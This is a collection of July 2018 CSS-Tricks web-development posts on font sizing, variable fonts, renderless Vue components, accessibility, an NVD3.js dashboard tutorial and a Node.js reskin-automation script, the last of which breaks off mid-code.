Web Standards

Your Body Text is Too Small

CSS-Tricks - Fri, 07/20/2018 - 5:37pm

Several years ago, there was a big push by designers to increase the font-size of websites and I feel like we’re living in another era of accessibility improvements where a fresh batch of designers are pushing for even larger text sizing today. Take this post by Christian Miller, for example, where he writes:

The majority of websites are still anywhere in the range of 15–18px. We’re starting to see some sites adopt larger body text at around 20px or even greater on smaller desktop displays, but not enough in my opinion.

Christian attributes this to all sorts of different things, but I particularly like this bit:

Unfortunately, it’s a common mistake to purposefully design a website in a way to avoid scrolling. To the detriment of design, body text size is reduced to either reduce scrolling, or condense the layout in order to fit other elements in and around the copy.

Scrolling is a natural, established pattern on the web—people expect to have to scroll. Even when it isn’t possible, people will attempt scrolling to see if a page offers more beyond what’s initially in the viewport. Readability is more important than the amount of scrolling required—good content won’t prevent users from scrolling.

I would only push back a little bit on the advice — that legibility isn’t always tied to the font-size of a block of text. A lot of the time it has to do with contrast instead — whether the typeface is easy to read and whether it is clearly visible against the background. Overall, though, there’s a lot of great advice for designers both new and old in this post.

Direct Link to Article

The post Your Body Text is Too Small appeared first on CSS-Tricks.

Font Playground

CSS-Tricks - Fri, 07/20/2018 - 9:29am

This is a wondrous little project by Wenting Zhang that showcases a series of variable fonts and lets you manipulate their settings to see the results. It’s interesting that so many tools like this have been released over the past couple of months: v-fonts, Axis-Praxis and Wakamai Fondue, just to name a few.

Direct Link to Article

The post Font Playground appeared first on CSS-Tricks.

Weird things variable fonts can do

CSS-Tricks - Fri, 07/20/2018 - 9:28am

I tend to think of variable fonts as a font format in which a single font file is capable of displaying type at near-infinite variations of things like boldness, width, and slantyness. In my experience, that's a common use case. Just check out many of the interactive demos over at Axis-Praxis:


Make sure to go play around at v-fonts.com as well for loads of variable font demonstrations.

But things like boldness, width, and slantyness are just a few of the attributes that a type designer might want to make controllable. There are no rules that say you have to make boldness a controllable attribute. Literally anything is possible, and people have been experimenting with that quite a bit.
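For instance, a type designer can expose any custom axis they dream up, and CSS can drive it through font-variation-settings. Here's a sketch; the font name and the "SRFF" serif-ness axis below are made up for illustration, while wght is a real registered axis:

```css
/* Registered axes use lowercase four-letter tags (wght, wdth, slnt...);
   custom, designer-defined axes use uppercase tags of the designer's choosing. */
h1 {
  font-family: 'SomeVariableFont';                /* hypothetical variable font */
  font-variation-settings: 'wght' 700, 'SRFF' 80; /* 'SRFF' = invented serif-ness axis */
}
```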

If you're interested in variable fonts, we have a whole guide with all the best articles we've published on the subject.

Here are some, ahem, weirder things that variable fonts can do.

A variable font can change its own serifyness

A typical job for a variable font is changing weight/width/slant... but it really can be _anything_.

Foreday is a font where you can change it's serifyness(1).https://t.co/t4soiQaYqH

(1) real word now ok. pic.twitter.com/5X0oGauUbf

— Chris Coyier (@chriscoyier) April 24, 2018

A variable font can be used for animation

Kind of like sprite sheet animation!

Y'all seem to be pretty into ➡️ variable fonts doing weird things ⬅️ so here's another mind-blower. pic.twitter.com/U2ok2tR6r8

— Chris Coyier (@chriscoyier) May 3, 2018

Toshi Omagari has made a number of absolutely bananas demos, including stuff like this pixelated video, which straight up breaks my brain:

A variable font can adjust its own attributes on three different axes

Another variable font thing that's pretty 😲 https://t.co/dzp92UxXqX pic.twitter.com/1mLxIhqoVR

— Chris Coyier (@chriscoyier) May 2, 2018

A variable font can change the hat on some poop

I hope you don't mind me tootin' my own horn, but there's also the glorious pioneering work of a variable color font called... Mr. Poo: https://t.co/aE2qWE69Cm pic.twitter.com/X3ylXzqtnT

— Roel Nieskens (@pixelambacht) May 8, 2018

A variable font can make the grass grow

This is a demo by Mandy Michael using Decovar, a "multistyle decorative variable font" by David Berlow.

See the Pen Grassy Text with Variable fonts. by Mandy Michael (@mandymichael) on CodePen.

Decovar is weird.

A variable font can make blood drip

This one is called Krabat by Josefína Karlíková:

There are loads of cool ones on The Next Big Thing in Type to check out. Here's another awesome one:

Variable fonts are a ripe field for experimentation!

The post Weird things variable fonts can do appeared first on CSS-Tricks.

Building “Renderless” Vue Components

CSS-Tricks - Fri, 07/20/2018 - 4:00am

There's this popular analogy for Vue that goes like this: Vue is what you get when React and Angular come together and make a baby. I've always shared this feeling. With Vue’s small learning curve, it's no wonder so many people love it. Vue tries to give the developer as much power over components and their implementation as it possibly can, and that flexibility leads us to today's topic.

The term renderless components refers to components that don’t render anything. In this article, we'll cover how Vue handles the rendering of a component.

We'll also see how we can use the render() function to build renderless components.

You may want to know a little about Vue to get the most out of this article. If you are a newbie, Sarah Drasner's got your back. The official documentation is also a very good resource.

Demystifying How Vue Renders a Component

Vue has quite a few ways of defining a component's markup. There's:

  • Single file components that let us define components and their markup like we would a normal HTML file.
  • The template component property, which allows us to use JavaScript template literals to define the markup for our component.
  • The el component property, which tells Vue to query the DOM for markup to use as the template.

You've probably heard the (possibly rather annoying) saying: at the end of the day, Vue and all its components are just JavaScript. I can see why you might think that statement is wrong, given the amount of HTML and CSS we write. Case in point: single file components.

With single file components, we can define a Vue component like this:

<template>
  <div class="mood">
    {{ todayIsSunny ? 'Makes me happy' : 'Eh! Doesn't bother me' }}
  </div>
</template>

<script>
export default {
  data: () => ({
    todayIsSunny: true
  })
}
</script>

<style>
.mood:after {
  content: '🎉🎉';
}
</style>

How can we say Vue is "just JavaScript" with all of that gobbledygook above? But, at the end of the day, it is. Vue does try to make it easy for our views to manage their styling and other assets, but Vue doesn't directly do that — it leaves it up to the build process, which is probably webpack.

When webpack encounters a .vue file, it'll run it through a transform process. During this process, the CSS is extracted from the component and placed in its own file, and the remaining contents of the file get transformed into JavaScript. Something like this:

export default {
  template: `
    <div class="mood">
      {{ todayIsSunny ? 'Makes me happy' : 'Eh! Doesn't bother me' }}
    </div>`,
  data: () => ({
    todayIsSunny: true
  })
}

Well... not quite what we have above. To understand what happens next, we need to talk about the template compiler.

The Template Compiler and the Render Function

This part of a Vue component’s build process is necessary for compiling and running every optimization technique Vue currently implements.

When the template compiler encounters this:

{
  template: `<div class="mood">...</div>`,
  data: () => ({
    todayIsSunny: true
  })
}

...it extracts the template property and compiles its content into JavaScript. A render function is then added to the component object. This render function will, in turn, return the extracted template property content that was converted into JavaScript.

This is what the template above will look like as a render function:

...
render(h) {
  return h(
    'div',
    { class: 'mood' },
    this.todayIsSunny ? 'Makes me happy' : 'Eh! Doesn't bother me'
  )
}
...

Refer to the official documentation to learn more about the render function.

Now, when the component object gets passed to Vue, the render function of the component goes through some optimizations and becomes a VNode (virtual node). VNode is what gets passed into snabbdom (the library Vue uses internally to manage the virtual DOM). Sarah Drasner does a good job explaining the "h" in the render function above.

A VNode is how Vue renders components. By the way, the render function also allows us to use JSX in Vue!

We also don’t have to wait for Vue to add the render function for us — we can define a render function and it should take precedence over el or the template property. Read here to learn about the render function and its options.

By building your Vue components with Vue CLI or some custom build process, you don't have to ship the template compiler, which would bloat your build file size. Your components are also pre-optimized for brilliant performance and really lightweight JavaScript files.

So... Renderless Vue Components

Like I mentioned, the term renderless components means components that don’t render anything. Why would we want components that don't render anything?

We can chalk it up to creating an abstraction of common component functionality as its own component and extending said component to create better and even more robust components. Also, S.O.L.I.D.

According to the Single responsibility principle of S.O.L.I.D.:

A class should only have one purpose.

We can port over that concept into Vue development by making each component have only one responsibility.

You may be like Nicky and, "pfft, yeah I know." Okay, sure! Your component may have the name "password-input" and it surely renders a password input. The problem with this approach is that when you want to reuse this component in another project, you may have to go into the component’s source to modify the style or the markup to keep in line with the new project’s style guide.

This breaks a rule of S.O.L.I.D. known as the open-closed principle which states that:

A class or a component, in this case, should be open for extension, but closed for modification.

This is saying that instead of editing the component's source, you should be able to extend it.

Since Vue understands S.O.L.I.D. principles, it lets components have props, events, slots, and scoped slots, which makes communication and extension of a component a breeze. We can then build components that have all the features, without any of the styling or markup, which is really great for reusability and efficient code.

Build a "Toggle" Renderless Component

This will be simple. No need to set up a Vue CLI project.

The Toggle component will let you toggle between on and off states. It'll also provide helpers that let you do that. It's useful for building components like, well, on/off components such as custom checkboxes and any components that need an on/off state.

Let's quickly stub our component: Head to the JavaScript section of a CodePen pen and follow along.

// toggle.js
const toggle = {
  props: {
    on: {
      type: Boolean,
      default: false
    }
  },
  render() {
    return []
  },
  data() {
    return {
      currentState: this.on
    }
  },
  methods: {
    setOn() {
      this.currentState = true
    },
    setOff() {
      this.currentState = false
    },
    toggle() {
      this.currentState = !this.currentState
    }
  }
}

This is pretty minimal and not yet complete. It needs a template, and since we don't want this component to render anything, we have to make sure it works with any component that does.

Cue the slots!

Slots in Renderless Components

Slots allow us to place content between the opening and closing tags of a Vue component. Like this:

<toggle>
  This entire area is a slot.
</toggle>

In Vue's single file components, we could do this to define a slot:

<template>
  <div>
    <slot/>
  </div>
</template>

Well, to do that using a render() function, we can:

// toggle.js
render() {
  return this.$slots.default
}

We can automatically place stuff within our toggle component. No markup, nothing.

Sending Data up the Tree with Scoped Slots

In toggle.js, we had some on state and some helper functions in the methods object. It’d be nice if we could give the developer access to them. We are currently using slots and they don’t let us expose anything from the child component.

What we want is scoped slots. Scoped slots work exactly like slots, with the added advantage that a component with a scoped slot can expose data without firing events.

We can do this:

<toggle>
  <div slot-scope="{ on }">
    {{ on ? 'On' : 'Off' }}
  </div>
</toggle>

That slot-scope attribute you can see on the div is de-structuring an object exposed from the toggle component.

Going back to the render() function, we can do:

render() {
  return this.$scopedSlots.default({})
}

This time around, we are calling the default property on the $scopedSlots object as a method because scoped slots are methods that take an argument. In this case, the method's name is default since the scoped slot wasn't given a name and it's the only scoped slot that exists. The argument we pass to a scoped slot can then be exposed from the component. In our case, let’s expose the current state of on and the helpers to help manipulate that state.

render() {
  return this.$scopedSlots.default({
    on: this.currentState,
    setOn: this.setOn,
    setOff: this.setOff,
    toggle: this.toggle,
  })
}

Using the Toggle Component

We can do this all in CodePen. Here is what we’re building:

See the Pen ZRaYWm by Samuel Oloruntoba (@kayandrae07) on CodePen.

Here’s the markup in action:

<div id="app">
  <toggle>
    <div slot-scope="{ on, setOn, setOff }" class="container">
      <button @click="click(setOn)" class="button">Blue pill</button>
      <button @click="click(setOff)" class="button isRed">Red pill</button>
      <div v-if="buttonPressed" class="message">
        <span v-if="on">It's all a dream, go back to sleep.</span>
        <span v-else>I don't know how far the rabbit hole goes, I'm not a rabbit, neither do I measure holes.</span>
      </div>
    </div>
  </toggle>
</div>
  1. First, we are de-structuring the state and helpers from the scoped slot.
  2. Then, within the scoped slot, we created two buttons, one to toggle current state on and the other off.
  3. The click method is just there to make sure a button was actually pressed before we display a result. You can check out the click method below.
new Vue({
  el: '#app',
  components: { toggle },
  data: {
    buttonPressed: false,
  },
  methods: {
    click(fn) {
      this.buttonPressed = true
      fn()
    },
  },
})

We can still pass props and fire events from the Toggle component. Using a scoped slot changes nothing.
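For instance, the on prop defined back in toggle.js can still seed the initial state from the parent. A sketch:

```html
<!-- The `on` prop from toggle.js works alongside the scoped slot -->
<toggle :on="true">
  <div slot-scope="{ on, toggle }">
    <button @click="toggle">{{ on ? 'On' : 'Off' }}</button>
  </div>
</toggle>
```

Internally, currentState is initialized from this.on in the component's data function, so this instance starts in the "On" state.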


This is a basic example, but we can see how powerful this can get when we start building components like a date picker or an autocomplete widget. We can reuse these components across multiple projects without having to worry about those pesky stylesheets getting in the way.

One more thing we can do is expose the attributes needed for accessibility from the scoped slot, so we don't have to worry about making every component that extends this one accessible.

In Summary
  • A component’s render function is incredibly powerful.
  • Build your Vue components for a faster run-time.
  • A component’s el and template properties, and even single file components, all get compiled into render functions.
  • Try to build smaller components for more reusable code.
  • Your code need not be S.O.L.I.D., but it’s a damn good methodology to code by.

The post Building “Renderless” Vue Components appeared first on CSS-Tricks.

CSS: A New Kind of JavaScript

CSS-Tricks - Thu, 07/19/2018 - 10:37am

In this wacky and satirical post, Heydon Pickering describes a wild new technology called Cascading Style Sheets that solves a lot of the problems you might bump into when styling things with JavaScript:

A good sign that a technology is not fit for purpose is how much we have to rely on workarounds and best practices to get by. Another sign is just how much code we have to write in order to get simple things done. When it comes to styling, JavaScript is that technology.

CSS solves JavaScript’s styling problems, and elegantly. The question is: are you willing to embrace the change, or are you married to an inferior methodology?

Yes, this is a funny post but the topic of CSS-in-JS is hot and quite active. We recently shared a video of Bruce Lawson's excellent talk on the subject and published a roundup of chatter about it as it relates to React. Chris also linked the conversation back to the age-old question of how we deal with unused CSS.

Direct Link to Article

The post CSS: A New Kind of JavaScript appeared first on CSS-Tricks.

Accessibility for Teams

CSS-Tricks - Thu, 07/19/2018 - 10:37am

Maya Benari:

Accessibility is a crucial part of government product design. First, it’s the law. Federal agencies face legal consequences when they don’t meet accessibility requirements. Second, it affects us all. Whether you have a motor disability, you sprained your wrist playing dodgeball, you need a building to have a ramp for your wheelchair or stroller, or you literally just have your hands full, we all find ourselves unable to do certain things at different points in our lives. Accessible products are better products for everyone.

But accessibility is hard: It comes across as a set of complex rules that are hard to follow. Not everyone feels confident that they’re doing it right. It’s difficult to prioritize alongside other work and project needs. How do you make sure you’re building products that are accessible and inclusive?

So they set about building a guide and did a heck of a job. This is 18F work, the same team that did the U.S. Web Design System (see video presentation).

Direct Link to Article

The post Accessibility for Teams appeared first on CSS-Tricks.

How to make a modern dashboard with NVD3.js

CSS-Tricks - Thu, 07/19/2018 - 3:58am

NVD3.js is a JavaScript visualization library that is free to use and open source. It’s derived from the well-known d3.js visualization library. When used the right way, this library can be extremely powerful for everyday tasks and even business operations.

For example, an online dashboard. We can use NVD3.js to compile data into a centralized space that visualizes the information in neat charts and graphs. That’s what we’re going to look at in this post.

Making a dashboard with NVD3.js for the first time is daunting, but after this tutorial, you should have the required knowledge to get your hands dirty and start building something awesome. Personally, I have a passion for visualizations on the web. They are both beautiful and meaningful at the same time.

Real-world use case: A data dashboard

Dashboards can be used for pretty much anything. As long as you've got data to analyze, you’re good to go, whether that be some sales data or the average weather for the last 20 years. Let’s build something like this:

See the Pen Dashboard NVD3.JS by Danny Englishby (@DanEnglishby) on CodePen.

Setting up the environment

To set up an NVD3 chart, we require three things:

  1. The NVD3 JavaScript library
  2. The NVD3 CSS library
  3. The D3.js library (a dependency for NVD3)

All of these are available through Cloudflare's CDN network. Here’s an HTML template with all those resources ready to go:

<!doctype html>
<html lang="en">
<head>
  <meta charset="utf-8">
  <title>Making a Dashboard</title>
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/nvd3/1.8.6/nv.d3.css">
</head>
<body>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/d3/3.5.2/d3.min.js"></script>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/nvd3/1.8.6/nv.d3.js"></script>
</body>
</html>

Data sources

For this tutorial, I thought using some raw, factual data that’s already been formatted into JSON would be easiest. I’m using two sources of information: one about global average temperatures over time and the other reporting world population statistics. I've already formatted the data into JSON, so it's ready to copy and paste!

Creating a line chart

Let’s go ahead and create a line chart with some global temperature data. The raw data I've put together in JSON represents the last twenty years of temperature changes compared to the global average.

First, we’ll add a placeholder element for the chart to attach to when the JavaScript is executed.

<div id="averageDegreesLineChart" class="with-3d-shadow with-transitions averageDegreesLineChart">
  <svg></svg>
</div>

Then add the following JSON in some script tags before the </body> tag:

var temperatureIndexJSON = [{
  key: "Temp +- Avg.",
  values: [
    { "x": 1998, "y": 0.45 }, { "x": 1999, "y": 0.48 }, { "x": 2000, "y": 0.5 },
    { "x": 2001, "y": 0.52 }, { "x": 2002, "y": 0.55 }, { "x": 2003, "y": 0.58 },
    { "x": 2004, "y": 0.6 }, { "x": 2005, "y": 0.61 }, { "x": 2006, "y": 0.61 },
    { "x": 2007, "y": 0.61 }, { "x": 2008, "y": 0.62 }, { "x": 2009, "y": 0.62 },
    { "x": 2010, "y": 0.62 }, { "x": 2011, "y": 0.63 }, { "x": 2012, "y": 0.67 },
    { "x": 2013, "y": 0.71 }, { "x": 2014, "y": 0.77 }, { "x": 2015, "y": 0.83 },
    { "x": 2016, "y": 0.89 }, { "x": 2017, "y": 0.95 }
  ]
}];

The x value is the year and the y value is the temperature in degrees Celsius.

The last piece to the puzzle is the most important function that creates the chart. The function named nv.addGraph() is the main function used throughout NVD3 and, within it, you initialize the chart object. In this example, we are using the lineChart object which can have methods chained to it, depending on what the visual requirements may be.

Check out the JavaScript comments to see what each line does.

nv.addGraph(function () {
  var chart = nv.models.lineChart()         // Initialise the lineChart object
    .useInteractiveGuideline(true);         // Turn on the interactive guideline (tooltips)
  chart.xAxis
    .axisLabel('TimeStamp (Year)');         // Set the label of the xAxis (horizontal)
  chart.yAxis
    .axisLabel('Degrees (c)')               // Set the label of the yAxis (vertical)
    .tickFormat(d3.format('.02f'));         // Rounded number format
  d3.select('#averageDegreesLineChart svg') // Select the element by the ID we defined earlier
    .datum(temperatureIndexJSON)            // Pass in the JSON
    .transition().duration(500)             // Set transition speed
    .call(chart);                           // Call & render the chart
  nv.utils.windowResize(chart.update);      // Listen for window resize so the chart responds and changes width
  return;
});

See the Pen Line Chart NVD3.JS by Danny Englishby (@DanEnglishby) on CodePen.

Creating two bar charts for the price of one

You will love the minimal effort of these next two charts. The power of NVD3.js enables switching between chart types. You can either have the toggle active so users can switch between a standard bar chart or a stacked bar chart. Or you can force the chart type and make it unchangeable.

The following examples show exactly how to do it.

Stacked multi-bar chart

You know those bar charts that stack two values together in the same bar? That’s what we’re doing here.

<div id="worldPopulationMultiBar" class="with-3d-shadow with-transitions worldPopulationMultiBar">
  <svg></svg>
</div>

var populationBySexAndCountryJSON = [{
  "key": "Male", "color": "#d62728",
  "values": [
    { "label": "China", "value": 717723466.166 },
    { "label": "India", "value": 647356171.132 },
    { "label": "United States of America", "value": 157464952.272 },
    { "label": "Indonesia", "value": 125682412.393 },
    { "label": "Brazil", "value": 98578067.1 },
    { "label": "Pakistan", "value": 93621293.316 },
    { "label": "Nigeria", "value": 88370210.605 },
    { "label": "Bangladesh", "value": 79237050.772 },
    { "label": "Russian Federation", "value": 65846330.629 },
    { "label": "Japan", "value": 61918921.999 }
  ]
}, {
  "key": "Female", "color": "#1f77b4",
  "values": [
    { "label": "China", "value": 667843070.834 },
    { "label": "India", "value": 604783424.868 },
    { "label": "United States of America", "value": 162585763.728 },
    { "label": "Indonesia", "value": 124183218.607 },
    { "label": "Brazil", "value": 101783857.9 },
    { "label": "Pakistan", "value": 88521300.684 },
    { "label": "Nigeria", "value": 85245134.395 },
    { "label": "Bangladesh", "value": 77357911.228 },
    { "label": "Russian Federation", "value": 76987358.371 },
    { "label": "Japan", "value": 65224655.001 }
  ]
}];

nv.addGraph(function () {
  var chart = nv.models.multiBarChart()
    .x(function (d) {
      return d.label;                       // Configure the x axis to use the "label" in the JSON
    })
    .y(function (d) {
      return d.value;                       // Configure the y axis to use the "value" in the JSON
    })
    .margin({top: 30, right: 20, bottom: 50, left: 85}) // Add some margin to the chart
    .showControls(false)                    // Turn off the switchable control
    .stacked(true);                         // Force stacked mode
  chart.xAxis.axisLabel('Countries');       // Add a label to the horizontal axis
  chart.yAxis.tickFormat(d3.format('0f'));  // Round the yAxis values
  d3.select('#worldPopulationMultiBar svg') // Select the element by ID
    .datum(populationBySexAndCountryJSON)   // Pass in the data
    .transition().duration(500)             // Set transition speed
    .call(chart);                           // Call & render the chart
  nv.utils.windowResize(chart.update);      // Listen for window resize so the chart responds and changes width
  return;
});

The two important settings in the JavaScript here are the .showControls and .stacked booleans. They both do what they say on the tin: force the graph to a stacked bar chart and don't allow switching of the chart type. You will see what I mean by switching soon.

See the Pen Multi StackedBar NVD3.JS by Danny Englishby (@DanEnglishby) on CodePen.

Standard multi-bar chart

Now, let’s do something a little more traditional and compare values side-by-side instead of stacking them in the same bar.

This uses pretty much the same code as the stacked examples, but we can change the .stacked boolean value to false. This will, of course, make the stacked bar chart a normal bar chart.

<div id="worldPopulationMultiBar" class="with-3d-shadow with-transitions worldPopulationMultiBar">
  <svg></svg>
</div>

var populationBySexAndCountryJSON = [{
  "key": "Male", "color": "#d62728",
  "values": [
    { "label": "China", "value": 717723466.166 },
    { "label": "India", "value": 647356171.132 },
    { "label": "United States of America", "value": 157464952.272 },
    { "label": "Indonesia", "value": 125682412.393 },
    { "label": "Brazil", "value": 98578067.1 },
    { "label": "Pakistan", "value": 93621293.316 },
    { "label": "Nigeria", "value": 88370210.605 },
    { "label": "Bangladesh", "value": 79237050.772 },
    { "label": "Russian Federation", "value": 65846330.629 },
    { "label": "Japan", "value": 61918921.999 }
  ]
}, {
  "key": "Female", "color": "#1f77b4",
  "values": [
    { "label": "China", "value": 667843070.834 },
    { "label": "India", "value": 604783424.868 },
    { "label": "United States of America", "value": 162585763.728 },
    { "label": "Indonesia", "value": 124183218.607 },
    { "label": "Brazil", "value": 101783857.9 },
    { "label": "Pakistan", "value": 88521300.684 },
    { "label": "Nigeria", "value": 85245134.395 },
    { "label": "Bangladesh", "value": 77357911.228 },
    { "label": "Russian Federation", "value": 76987358.371 },
    { "label": "Japan", "value": 65224655.001 }
  ]
}];

nv.addGraph(function () {
  var chart = nv.models.multiBarChart()
    .x(function (d) {
      return d.label;                       // Configure the x axis to use the "label" in the JSON
    })
    .y(function (d) {
      return d.value;                       // Configure the y axis to use the "value" in the JSON
    })
    .margin({top: 30, right: 20, bottom: 50, left: 85}) // Add some margin to the chart
    .showControls(false)                    // Turn off the switchable control
    .stacked(false);                        // *** Force normal bar mode ***
  chart.xAxis.axisLabel('Countries');       // Add a label to the horizontal axis
  chart.yAxis.tickFormat(d3.format('0f'));  // Round the yAxis values
  d3.select('#worldPopulationMultiBar svg') // Select the element by ID
    .datum(populationBySexAndCountryJSON)   // Pass in the data
    .transition().duration(500)             // Set transition speed
    .call(chart);                           // Call & render the chart
  nv.utils.windowResize(chart.update);      // Listen for window resize so the chart responds and changes width
  return;
});

The one change to the settings presents us with a brand-new looking chart.

See the Pen Multi Bar NVD3.JS by Danny Englishby (@DanEnglishby) on CodePen.

Using one code set with minimal changes, you just created two epic charts for the price of one. Kudos to you!

There is one last setting, of course, if you want the functionality of switching charts. Change the .showControls to true and remove the .stacked option. You will notice some controls at the top of the chart. Clicking them will toggle the view between a stacked and standard chart.

See the Pen Multi Bar Switchable NVD3.JS by Danny Englishby (@DanEnglishby) on CodePen.

Making a dashboard

There's nothing I love looking at more in the world of web development than dashboards. They never get old and are super good looking. By using the charting techniques we’ve already covered, we can make our own responsive dashboard on a single webpage.

If you remember within the JavaScript snippets earlier, there was a function set with a listener against each chart: nv.utils.windowResize(chart.update);

This magical function resizes the chart for you as if it were set to width: 100% in CSS. It doesn't just shrink the chart, though; it also moves and restructures the graph according to the size of the screen. It's pretty awesome! All we need to worry about are the heights, which we can set by applying flexbox to the classes assigned to the chart elements.

Let’s bundle everything we have so far into one dashboard by wrapping each chart element in a flexbox container. Apply a small amount of CSS for the flexing and height, and finally, compile all the scripts into one (or, you can keep them separate in your own project).
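The CSS side of that wrapper might look something like this (the class names below are made up to illustrate the idea, not copied from the demo):

```css
/* Hypothetical flexbox wrapper: charts share a row and wrap on small screens */
.dashboard {
  display: flex;
  flex-wrap: wrap;
}
.dashboard .chart {
  flex: 1 1 420px; /* grow and shrink, with a comfortable minimum width */
  height: 320px;   /* NVD3 handles the width; we only pin the height */
}
```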

See the Pen Dashboard NVD3.JS by Danny Englishby (@DanEnglishby) on CodePen.


This tutorial will hopefully give you the knowledge to get started with building data visualizations and, ultimately, add them into a production dashboard. Even if you only want to play with these concepts, I'm sure your mind will start running with ideas for how to transform different types of data into stunning visuals.

The post How to make a modern dashboard with NVD3.js appeared first on CSS-Tricks.

The State of Headless CMS Market

CSS-Tricks - Thu, 07/19/2018 - 3:53am

(This is a sponsored post.)

In March and April 2018, Kentico conducted the first global report on the state of the headless CMS market. We surveyed 986 CMS practitioners in 85 countries about their opinions, adoption, and plans for using headless CMS. The survey contains valuable industry insights into topics such as headless CMS awareness, preferred headless CMS models, current and future uptake of the headless CMS approach, and much more, from leading industry players.

Download your complimentary copy of the full report now.

Direct Link to Article

The post The State of Headless CMS Market appeared first on CSS-Tricks.

What bit of advice would you share with someone new to your field?

CSS-Tricks - Wed, 07/18/2018 - 4:17am

The most FA of all the FAQs.

Here's Laura Kalbag:

Find what you love. Don’t worry about needing to learn every language, technique or tool. Start with what interests you, and carve your own niche. And then use your powers for good!

And my own:

Buy a domain name. Figure out how to put an HTML file up there. Isn’t that a powerful feeling? Now you’ve got table stakes. Build something.

Definitely go read the other A Book Apart author answers because they are all great. My other favorite is just three words.

Direct Link to Article

The post What bit of advice would you share with someone new to your field? appeared first on CSS-Tricks.

Automate Your Workflow with Node

Css Tricks - Wed, 07/18/2018 - 4:07am

You know those tedious tasks you have to do at work: Updating configuration files, copying and pasting files, updating Jira tickets.

Time adds up after a while. This was very much the case when I worked for an online games company back in 2016. The job could be very rewarding at times when I had to build configurable templates for games, but about 70% of my time was spent on making copies of those templates and deploying re-skinned implementations.

What is a reskin?

The definition of a reskin at the company was using the same game mechanics, screens and positioning of elements, but changing the visual aesthetics such as color and assets. So in the context of a simple game like ‘Rock Paper Scissors,’ we would create a template with basic assets like below.

But when we create a reskin of this, we would use different assets and the game would still work. If you look at games like Candy Crush or Angry Birds, you’ll find that they have many varieties of the same game. Usually Halloween, Christmas or Easter releases. From a business perspective it makes perfect sense.

Now… back to our implementation. Each of our games would share the same bundled JavaScript file, and load in a JSON file that had different content and asset paths. The result?

The good thing about extracting configurable values into a JSON file is that you can modify the properties without having to recompile/build the game again. Using Node.js and the original breakout game created by Mozilla, we will make a very simple example of how you can create a configurable template, and make releases from it by using the command line.
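To make that benefit concrete, here is a minimal sketch of the idea (the values are illustrative, not taken from the real template): the game bundle ships with defaults, and a reskin's JSON simply overrides them at load time, so no rebuild is needed.

```javascript
// Defaults baked into the shared game template.
const templateConfig = {
  primaryColor: '#fff',
  secondaryColor: '#000'
};

// Values a particular reskin's game.json would supply at runtime.
const reskinConfig = {
  primaryColor: '#76cad8',
  secondaryColor: '#10496b'
};

// Merge them: the reskin's values win, the bundle is untouched.
const config = Object.assign({}, templateConfig, reskinConfig);

console.log(config.primaryColor);   // '#76cad8'
console.log(config.secondaryColor); // '#10496b'
```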

Our game

This is the game we’ll be making. Reskins of MDN Breakout, based on the existing source code.

Gameplay screen from the game MDN Breakout where you can use your paddle to bounce the ball and destroy the brick field, while keeping track of the score and lives.

The primary color will paint the text, paddle, ball and blocks, and the secondary color will paint the background. We will proceed with an example of a dark blue background and a light sky blue for the foreground objects.


You will need to ensure the following:

We have tweaked the original Firefox implementation so that we first read in the JSON file and then build the game using HTML Canvas. The game will read in a primary color and a secondary color from our game.json file.

{
  "primaryColor": "#fff",
  "secondaryColor": "#000"
}

We will be using example 20 from the book Automating with Node.js. The source code can be found here.

Open up a new command line (CMD for Windows, Terminal for Unix-like Operating systems) and change into the following directory once you have cloned the repository locally.

$ cd nobot-examples/examples/020

Remember the game server should be running in a separate terminal.

Our JSON file sits beside an index.html file inside a directory called template. This is the directory that we will copy from whenever we want to do a new release/copy.

<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <title>Paddle Game</title>
  <style>
    * { padding: 0; margin: 0; }
    canvas { background: #eee; display: block; margin: 0 auto; }
  </style>
</head>
<body>
  <canvas id="game" width="480" height="320"></canvas>
  <script type="text/javascript" src="../../core/game-1.0.0.js"></script>
</body>
</html>

You see above that every game we release will point to the same core bundle JavaScript file. Let’s have a look at our JavaScript implementation under the core directory.

Don’t look too much into the mechanics of how the game works, more so how we inject values into the game to make it configurable.

(function boot(document) {
  function runGame(config) {
    const canvas = document.getElementById('game');
    canvas.style.backgroundColor = config.secondaryColor;
    // rest of game source code gets executed... hidden for brevity
    // source can be found here: https://git.io/vh1Te
  }

  function loadConfig() {
    fetch('game.json')
      .then(response => response.json())
      .then(runGame);
  }

  document.addEventListener('DOMContentLoaded', () => {
    loadConfig();
  });
}(document));

The source code is using ES6 features and may not work in older browsers. Run it through Babel if this is a problem for you.

You can see that we are waiting for the DOM content to load, and then we are invoking a method called loadConfig. This is going to make an AJAX request to game.json, fetch our JSON values, and once it has retrieved them, it will initiate the game and assign the styles in the source code.

Here is an example of the configuration setting the background color.

const canvas = document.getElementById('game');
canvas.style.backgroundColor = config.secondaryColor; // overriding color here

So, now that we have a template that can be configurable, we can move on to creating a Node.js script that will allow the user to either pass the name of the game and the colors as options to our new script, or will prompt the user for: the name of the game, the primary color, and then the secondary color. Our script will enforce validation to make sure that both colors are in the format of a hex code (e.g. #101b6b).

When we want to create a new game reskin, we should be able to run this command to generate it:

$ node new-reskin.js --gameName='blue-reskin' --gamePrimaryColor='#76cad8' --gameSecondaryColor='#10496b'

The command above will build the game immediately, because it has the three values it needs to release the reskin.

We will create this script new-reskin.js, and this file carries out the following steps:

  1. It will read in the options passed in the command line and store them as variables. Options can be read in by looking in the process object (process.argv).
  2. It will validate the values making sure that the game name, and the colors are not undefined.
  3. If there are any validation issues, it will prompt the user to re-enter it correctly before proceeding.
  4. Now that it has the values, it will make a copy of the template directory and place a copy of it into the releases directory and name the new directory with the name of the game we gave it.
  5. It will then read the JSON file just recently created under the releases directory and override the values with the values we passed (the colors).
  6. At the end, it will prompt the user to see if they would like to open the game in a browser. It adds some convenience, rather than us trying to remember what the URL is.

Here is the full script. We will walk through it afterwards.

require('colors');
const argv = require('minimist')(process.argv.slice(2));
const path = require('path');
const readLineSync = require('readline-sync');
const fse = require('fs-extra');
const open = require('opn');

const GAME_JSON_FILENAME = 'game.json';

let { gameName, gamePrimaryColor, gameSecondaryColor } = argv;

if (gameName === undefined) {
  gameName = readLineSync.question('What is the name of the new reskin? ', {
    limit: input => input.trim().length > 0,
    limitMessage: 'The project has to have a name, try again'
  });
}

const confirmColorInput = (color, colorType = 'primary') => {
